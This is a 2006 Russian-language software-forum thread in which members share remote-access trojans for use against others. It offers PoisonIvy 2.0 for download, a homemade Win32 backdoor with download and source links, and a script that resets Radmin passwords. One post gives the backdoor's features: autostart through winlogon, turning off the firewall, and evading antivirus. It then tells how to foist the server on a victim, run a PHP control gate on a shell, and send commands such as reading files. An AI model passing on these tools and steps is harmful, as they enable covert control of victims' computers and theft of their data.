SoftoRooM LifeRooM Whois RSS GZip WAP Поиск Правила Помощь Disclaimer
Твой софтовый форумТвой софтовый форумТвой софтовый форумТвой софтовый форум

Здравствуйте Гость ( Вход | Регистрация )

Viruses.. Do not open!


 
post 18.07.2006 - 10:03
Отправлено #1
de1ay



Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.848
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 611
-----XXXX-




PoisonIvy 2.0
Меня трой порадовал smile.gif Удобный, неглючный, с форумом поддержки

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

. Вроде всё, качаем и наслаждаемся. (Внутри архива .pdf файлик с инструкциями)

PS:Хотелось-бы выразить благодарность в поимке лошадки в интернете парню с ником One Second wink.gif

Пароль:

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

4 Страницы  1 2 3 > »  
Reply to this topicStart new topicStart Poll
Ответов(1 - 9)
 
post 2.08.2006 - 11:02
Отправлено #2
Jon-dog



Грамотный
***

Профиль
Группа: Пользователи
Сообщений: 220
Регистрация: 29.11.2005
Пользователь №: 76.326


Респектов: 13
-----X----


Предупреждений:   0


Вот немного руссифицировал чтоб кто в англ плохо, понимали как сделать ехе

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |



Сообщение отредактировал Jon-dog - 2.08.2006 - 11:03
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 26.08.2006 - 19:46
Отправлено #3
DemonRND



Unregistered


Профиль












Касперский его заметил... Обидно, а так класный тойанчик))
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 28.08.2006 - 15:11
Отправлено #4
snike



Опытный юзверь
**

Профиль
Группа: Пользователи
Сообщений: 96
Регистрация: 20.01.2006
Пользователь №: 111.522


Респектов: 19
-----X----


Предупреждений:   0


многофункциональный бэкдор под Win32-системы, работающий по
архитектуре "клиент-сервер", с помощью которого можно практически полностью контролировать
зараженную систему.

Возможности:
- Выполнять любые команды в системе через коммандный интерпретатор cmd.exe
- Работа с файловой системой через cmd.exe
- Запускать любые программы в системе
- Выводить свое сообщение
- Выключать/Перезагужать/Завершить сеанс зараженной машины
- Закрывать/Открывать CD-ROM
- Включать/Выключать монитор
- Устанавливать свои собственные обои
- Выставлять мышь на левшу/правшу
- Установка курсора в разные координаты (:
- Включать/Выключать Scroll Lock, Num Lock, Caps Lock на клавиатуре
- Прятать кнопку "ПУСК", панель со свернутыми окнами, Quick Launch, часы, трей и т.д

Фичи:
- Автозагрзука из под winlogon (Userinit).
- Вырубает встроенный Windows-файрвол (ICF/ICS и WSCSVC), который блокирует коннекты к машине
- Управление зараженной машиной через PHP-гейт. Теперь об анонимности можно беспокоиться в два раза меньше.
- Маленький размер сервера. Всего ~4,50 килобайт (паковал FSG, компилил LCC, так что возможно еще меньше).
- На момент релиза, ни один антивирус не определил троянский код.
Впариваем троян (/server/server.exe) ламеру. Затем заливаем на шелл скрипт управлением трояном (/web/gate.php).
На шелле должен быть установлен PHP и поддерживаться работа с сокетами. Узнаем IP-адрес ламера. Заходим на
скрипт:
http://shell/sbg.php?ipaddr=127.0.0.1&port=5745, где 127.0.0.1 - это IP-адрес жертвы. Затем вводим команды
в одно единственное поле.

----[ 0x02: команды

команды без аргументов:

CODE
hide_panel       /     show_panel
hide_start       /     show_start
hide_rebar       /     show_rebar
hide_quicklaunch /     show_quicklaunch
hide_tasksw      /     show_tasksw
hide_trey        /     show_trey
hide_treybutton  /     show_treybutton
hide_treyicon    /     show_treyicon
hide_time        /     show_time
mouse_on         /     mouse_off
mouse_swap_on    /     mouse_swap_off
numlock_on       /     numlock_off
capslock_on      /     capslock_off
scrolllock_on    /     scrolllock_off
keyboard_on      /     keyboard_off
monitor_on       /     monitor_off
cdrom_open       /     cdrom_close
logof / power / rboot / stand / sleep
about
beep


команды c аргументами:

CODE
set_wallpaper^C:\путь\к\картинке\в\формате.BMP
cmd^комманда
messagebox^текст_сообщения^заголовок_сообщения
crazy_cdrom^кол-во_выдвигов/задвигов
crazy_mouse^частота_сдвигов(мл.сек)^кол-во_раз


Примеры ввода команд:
CODE
  monitor_off
  messagebox^Hacked by SN!KE=))^
  cmd^dir
  cmd^type C:\a.txt

Короче говоря ^ - разделитель.
_http://rapidshare.de/files/31054280/ScriptKid_BackDoor_v0.01_beta.rar
З.Ы. При желании могу выложить исходник.
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 29.08.2006 - 22:19
Отправлено #5
snike



Опытный юзверь
**

Профиль
Группа: Пользователи
Сообщений: 96
Регистрация: 20.01.2006
Пользователь №: 111.522


Респектов: 19
-----X----


Предупреждений:   0


Погляди на свой "Press any key to format C:"
_http://rapidshare.de/files/31227999/sr.rar
Исходники...
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 20.09.2006 - 17:25
Отправлено #6
de1ay



Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.848
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 611
-----XXXX-




| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 23.09.2006 - 15:27
Отправлено #7
snike



Опытный юзверь
**

Профиль
Группа: Пользователи
Сообщений: 96
Регистрация: 20.01.2006
Пользователь №: 111.522


Респектов: 19
-----X----


Предупреждений:   0


Какая версия Ксинча?
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 25.09.2006 - 14:57
Отправлено #8
de1ay



Cardable Unit
[SoftoRooMTeaM] Group Icon

Профиль
Группа: СуперМодераторы
Сообщений: 3.848
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 611
-----XXXX-




QUOTE
Какая версия Ксинча?

1.5 alfa 3 wink.gif
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 6.12.2006 - 5:27
Отправлено #9
Jon-dog



Грамотный
***

Профиль
Группа: Пользователи
Сообщений: 220
Регистрация: 29.11.2005
Пользователь №: 76.326


Респектов: 13
-----X----


Предупреждений:   0


Трой не трой, и троем то не назвать, и вурусом, вобщем скрипт сброса (удаления) пароля на радмин при каждой перезагрузке компа! провернено на 2.1, 22

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post

 
post 9.12.2006 - 9:50
Отправлено #10
mabden



Новичок


Профиль
Группа: Пользователи
Сообщений: 8
Регистрация: 15.06.2006
Пользователь №: 179.753


Респектов: 0
----------


Предупреждений:  


Jon-dog не сможешь еще раз вылажить русик к PoisonIvy 2.0
User is offlineProfile CardPM
Go to the top of the pageGo to the end of the page
+Quote Post


Reply to this topicTopic OptionsStart new topic
 


  Яндекс цитирование   Rambler's Top100
LITE - версия | WAP - версия